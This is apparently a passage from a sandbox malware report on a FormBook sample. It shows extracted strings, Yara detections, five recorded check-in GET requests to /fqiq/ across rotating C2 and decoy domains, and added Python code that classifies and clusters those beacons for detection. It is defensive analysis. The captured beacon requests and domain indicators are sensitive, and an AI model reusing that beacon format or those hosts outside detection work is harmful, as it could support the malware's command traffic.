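    # Split by hand: parse_qs would turn the '+' inside the values into spaces.
    params = dict(p.split("=", 1) for p in query.split("&") if p)
    return {"method": method, "path": path, "params": params,
            "headers": headers, "body": body}


def checkin_traits(req: dict) -> list:
    """Traits of the FormBook check-in that are visible in the capture."""
    traits = []
    if req["method"] == "GET" and req["body"] and set(req["body"]) == {0}:
        traits.append("nul_body_on_get")      # GET carrying a body of NUL bytes
    if "user-agent" not in req["headers"]:
        traits.append("no_user_agent")        # "HTTP GET or POST without a user agent"
    if req["headers"].get("connection", "").lower() == "close":
        traits.append("connection_close")
    if len(req["params"]) == 2 and all(re.fullmatch(r"[A-Za-z0-9]{4}", k) for k in req["params"]):
        traits.append("two_4char_params")
    return traits


def classify_host(req: dict, config: dict) -> str:
    """'c2' if host and path match the C2 list, 'decoy' if the domain is a decoy."""
    host = req["headers"].get("host", "").lower()
    c2 = {}
    for entry in config["C2 list"]:
        c2_host, _, c2_path = entry.lower().partition("/")
        c2[c2_host] = "/" + c2_path
    if c2.get(host) == req["path"]:
        return "c2"
    bare = host[4:] if host.startswith("www.") else host
    if bare in {d.lower() for d in config["decoy"]}:
        return "decoy"
    return "unknown"


def constant_params(reqs: list) -> dict:
    """Query name=value pairs repeated in every request: candidate per-sample IOCs."""
    sets = [set(r["params"].items()) for r in reqs]
    return dict(set.intersection(*sets)) if sets else {}


def triage(raw_requests: list, config: dict) -> list:
    reqs = [parse_request(r) for r in raw_requests]
    return [(r["headers"].get("host"), classify_host(r, config), checkin_traits(r)) for r in reqs]


if __name__ == "__main__":
    for host, label, traits in triage(RAW_REQUESTS, CONFIG):
        print(f"{host:32s} {label:7s} {','.join(traits)}")
    print("constant:", constant_params([parse_request(r) for r in RAW_REQUESTS]))
```

Only the host that matches both the configured domain and the /fqiq/ path is labelled c2; the other four hosts are decoys from the same configuration and should be blocked or logged, but not reported as the operator's infrastructure.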
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmp, String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: divpCHa0h7.exe, 00000001.00000003.266066263.00000000059E0000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comasno
Source: divpCHa0h7.exe, 00000001.00000003.246781947.00000000059FB000.00000004.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: divpCHa0h7.exe, 00000001.00000003.246654381.00000000059FB000.00000004.00000001.sdmp, String found in binary or memory: http://www.fonts.comX
Source: divpCHa0h7.exe, 00000001.00000003.246591944.00000000059FB000.00000004.00000001.sdmp, String found in binary or memory: http://www.fonts.comn
Source: divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmp, divpCHa0h7.exe, 00000001.00000003.249127036.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: divpCHa0h7.exe, 00000001.00000003.249127036.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/c
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn_
Source: divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cna-d
Source: divpCHa0h7.exe, 00000001.00000003.248804655.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cnl
Source: divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cnr-f
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/.
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/CursJ
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/Gras
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0zS
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/a-e7
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/o
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/ri
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/t
Source: divpCHa0h7.exe, 00000001.00000003.246488006.00000000059FB000.00000004.00000001.sdmp, divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
Source: divpCHa0h7.exe, 00000001.00000003.246488006.00000000059FB000.00000004.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.coma-d
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
Source: divpCHa0h7.exe, 00000001.00000003.247974313.00000000059E6000.00000004.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.tiro.com
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.typography.netD
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknown | DNS traffic detected: queries for: www.ribbonofficial.com
          Source: global traffic | HTTP traffic detected: GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe1OoxOfJLYr HTTP/1.1 | Host: www.ribbonofficial.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /fqiq/?ZvEd=prTEVkQtidVRbelnknUsCYHPcHrUQSHWronmvObfBYwGPcpLSCQwPhh2tosJT24FW2ZT&z0DH=f0Dtar1PYnAdDzS HTTP/1.1 | Host: www.sanlifalan.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=cd5R1bQkGt60ucaw3I3E0k/wUnqrUWXrQueIKe7m3jIZGD6slZfTAntz2qvR4Gb0BO+l HTTP/1.1 | Host: www.floaterslaser.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzS HTTP/1.1 | Host: www.mambacustomboats.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS HTTP/1.1 | Host: www.esyscoloradosprings.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
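          The five GETs above share the path /fqiq/ and the value of one query parameter while the Host header rotates through unrelated domains; FormBook beacons across a list of decoy and real C2 domains in exactly this way. The following is an added example, not code from the report or from Joe Sandbox, that turns the pattern into a check over HTTP request records: the five report requests are re-typed as constructed input, the benign control requests and the function names are this example's own, and the three-host threshold is an assumed tuning value.

```python
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed input: request line, Host header, Connection header and raw
# body, re-typed from the report's five "HTTP traffic detected" entries.
REPORT_REQUESTS = [
    ("GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe1OoxOfJLYr HTTP/1.1",
     "www.ribbonofficial.com", "close", b"\x00" * 7),
    ("GET /fqiq/?ZvEd=prTEVkQtidVRbelnknUsCYHPcHrUQSHWronmvObfBYwGPcpLSCQwPhh2tosJT24FW2ZT&z0DH=f0Dtar1PYnAdDzS HTTP/1.1",
     "www.sanlifalan.com", "close", b"\x00" * 7),
    ("GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=cd5R1bQkGt60ucaw3I3E0k/wUnqrUWXrQueIKe7m3jIZGD6slZfTAntz2qvR4Gb0BO+l HTTP/1.1",
     "www.floaterslaser.com", "close", b"\x00" * 7),
    ("GET /fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzS HTTP/1.1",
     "www.mambacustomboats.com", "close", b"\x00" * 7),
    ("GET /fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS HTTP/1.1",
     "www.esyscoloradosprings.com", "close", b"\x00" * 7),
]

# Constructed benign control (this example's own): one search hit against two hosts.
BENIGN_REQUESTS = [
    ("GET /search?q=printer+driver&page=1 HTTP/1.1", "www.example.com", "keep-alive", b""),
    ("GET /search?q=printer+driver&page=2 HTTP/1.1", "www.example.org", "keep-alive", b""),
]


def parse_request(request_line, host, connection, body):
    """Split an HTTP/1.1 request line into method, path and query parameters."""
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    # keep_blank_values so a key with an empty value still counts as a key
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    return {
        "method": method,
        "host": host,
        "path": parts.path,
        "params": params,
        "connection": connection.lower(),
        # a GET with a body made only of NUL bytes is something no browser sends
        "null_body": len(body) > 0 and all(b == 0 for b in body),
    }


def find_beacon_clusters(requests, min_hosts=3):
    """Group GETs by (path, parameter-key set) and flag domain-rotating beacons.

    A cluster is reported when the same path and key set reach at least
    min_hosts distinct hosts, one parameter keeps a constant value (the
    campaign/bot marker) and another rotates (the encrypted payload).
    """
    clusters = defaultdict(list)
    for req in (parse_request(*r) for r in requests):
        if req["method"] != "GET":
            continue
        # frozenset of keys: FormBook shuffles parameter order between requests
        clusters[(req["path"], frozenset(req["params"]))].append(req)

    findings = []
    for (path, keys), reqs in clusters.items():
        hosts = sorted({r["host"] for r in reqs})
        if len(hosts) < min_hosts:
            continue
        constant, rotating = {}, []
        for key in sorted(keys):
            values = {r["params"][key] for r in reqs}
            if len(values) == 1:
                constant[key] = values.pop()
            else:
                rotating.append(key)
        if not constant or not rotating:
            continue
        findings.append({
            "path": path,
            "hosts": hosts,
            "constant_params": constant,
            "rotating_params": rotating,
            "null_body": all(r["null_body"] for r in reqs),
            "connection_close": all(r["connection"] == "close" for r in reqs),
        })
    return findings


if __name__ == "__main__":
    for f in find_beacon_clusters(REPORT_REQUESTS):
        print("beacon cluster %s across %d hosts, constant %s, rotating %s"
              % (f["path"], len(f["hosts"]), f["constant_params"], f["rotating_params"]))
```

          Grouping on the key set rather than key order matters because the parameter order differs between the first and second request above; the constant parameter is what ties the beacons to one campaign across hosts, and the seven-NUL-byte body on a GET is a second, independent oddity that an IDS rule can match on its own.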

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: divpCHa0h7.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
